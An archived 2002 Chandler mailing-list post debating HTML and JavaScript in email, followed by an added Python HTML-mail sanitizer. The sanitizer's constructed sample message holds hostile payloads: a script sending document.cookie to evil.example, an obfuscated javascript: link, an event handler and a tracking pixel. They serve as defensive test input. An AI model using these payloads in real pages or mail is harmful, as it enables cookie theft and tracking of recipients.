Open Source Applications Foundation

[Dev] Re: [Design] Obvious Scripting Security Notes

Wes Felter Sun, 03 Nov 2002 19:14:52 -0600


on 11/3/02 6:18 PM, Paul Snively at psnively@earthlink.net wrote:

>> I don't see how Chandler can NOT not do HTML email.  Plug-ins are
>> vital as well.
>> 
> *sigh* OK; I was afraid of this. I have to say that if you accept this
> combination as a pair of requirements, and probably also insist on
> supporting JavaScript in the HTML with backward compatibility with MSIE
> and/or Outlook, then you will inherit the complete lack of any kind of
> security focus that MSIE and/or Outlook suffers from, plus you'll open
> new vectors of attack to the extent that this gaping hole is embedded
> into the rest of Chandler.

I don't agree. Entourage supports HTML mail, and it probably supports JS in
mail, but I've never heard of any security holes due to this. It seems
simple enough to declare that JS inside a message cannot see or modify
*anything* outside of that message, and my intuition is that this will
support all use cases. Such a security model has the advantage that it
doesn't need to be configurable.

>> I know it's a challenge, so let's start working on it.
> 
> Quite right. Perhaps we should begin by drafting as comprehensive a set
> of use-cases for Chandler as possible, and articulate some functional
> requirements. For example, I wouldn't have expected "HTML e-mail" to be
> a requirement; as far as I can tell, HTML e-mail is used only for spam,
> and that primarily so that web-bugs can be used to track who actually
> reads the e-mail.

I tend to agree here. I've only seen two kinds of HTML email:

* Simple HTML (no images, no JS) from people who are using OE with default
settings.
* Hostile mail (spam, viruses, etc.)

So based on these use cases, I see no need for JS support at all.

I can imagine use cases for the "enterprise" market that would require JS,
such as form-based workflow. But does that apply to Chandler?

> Supporting browser plug-ins makes it quite literally
> impossible to make any strong security claims at all.

I think Mitch said plug-ins, not Web browser plug-ins. I would appreciate
the ability to view attachments inline and I don't see how this introduces
any security implications.

[unnecessary capabilities advocacy snipped :-)]

Wes Felter - wesley@felter.org - http://felter.org/wesley/
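The "simple HTML (no images, no JS)" policy Wes describes above is only a policy until something enforces it on the message body before it reaches the renderer. The following is an added example of that enforcement, not code from this thread or from the Chandler project: an allowlist-based HTML mail sanitizer built on Python's standard-library `html.parser`. The names `MailSanitizer`, `sanitize_mail_html` and the allowlists are mine, and `SAMPLE` is a constructed message that packs in the things the thread worries about (an inline event handler, a `javascript:` link obfuscated with an entity-encoded newline, a one-pixel tracking image, a `<script>` block, and an `<iframe>` hidden in an IE conditional comment).

```python
from html.parser import HTMLParser
from html import escape

# Policy (assumption for this example): "simple HTML" only. Everything not
# listed here is stripped. Note that img is deliberately absent: no remote
# images means no web bugs.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li",
                "blockquote", "a", "h1", "h2", "h3", "pre", "code", "div", "span"}
# Elements whose *content* must be discarded too, not just the tag pair.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "applet", "noscript"}
VOID_TAGS = {"br"}
# Attribute allowlist per tag; no style, no on* handlers, nothing on other tags.
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class MailSanitizer(HTMLParser):
    """Rebuilds the document from parsed tokens; only allowlisted output is emitted."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside a DROP_CONTENT element
        self.open_tags = []   # stack of emitted tags, so output stays well-formed
        self.dropped = []     # audit trail of what was removed

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = 1
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)   # e.g. img, form, input: tag removed, text kept
            return
        safe_attrs = []
        for name, value in attrs:      # HTMLParser lowercases names and decodes entities
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                if name.startswith("on"):
                    self.dropped.append(f"{tag}@{name}")
                continue
            if name == "href":
                raw = value or ""
                # Browsers ignore whitespace/control characters inside a scheme,
                # so "jav\nascript:" must be checked as "javascript:".
                scheme_view = "".join(c for c in raw if c.isprintable() and not c.isspace()).lower()
                if not scheme_view.startswith(SAFE_SCHEMES):
                    self.dropped.append(f"{tag}@href")
                    continue
            safe_attrs.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(safe_attrs)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # Close anything left open inside it so the output nests properly.
            while True:
                top = self.open_tags.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # re-encode decoded text

    # Comments (including IE conditional comments) are discarded: default no-op.

    def result(self):
        self.close()                       # flush buffered text
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_mail_html(html):
    """Return (sanitized_html, list_of_dropped_items)."""
    p = MailSanitizer()
    p.feed(html)
    return p.result(), p.dropped


# Constructed sample message (not a real captured mail).
SAMPLE = (
    '<p onmouseover="alert(1)">Hi <b>Wes</b>, see <a href="https://example.com/a">this</a> '
    'and <a href="jav&#x0a;ascript:alert(document.cookie)">this</a>.</p>'
    '<img src="http://tracker.example/bug.gif?id=42" width="1" height="1">'
    '<script>document.location="http://evil.example/"+document.cookie</script>'
    '<!--[if IE]><iframe src="http://evil.example"></iframe><![endif]-->'
    '<div>unclosed <i>italic'
)

if __name__ == "__main__":
    cleaned, dropped = sanitize_mail_html(SAMPLE)
    print(cleaned)
    print("dropped:", dropped)
```

Two caveats worth keeping in mind. First, this implements the weaker of the two positions in the message: it removes script rather than confining it, so it says nothing about Wes's stronger model in which JS runs but "cannot see or modify anything outside of that message"; that needs an isolation boundary in the renderer, not a filter. Second, the allowlist is the whole security argument: anything that lets a tag or attribute through that was not explicitly listed (style attributes, `<link>`, CSS `url()`) reopens the remote-fetch and script channels, so extend the allowlists only with that in mind.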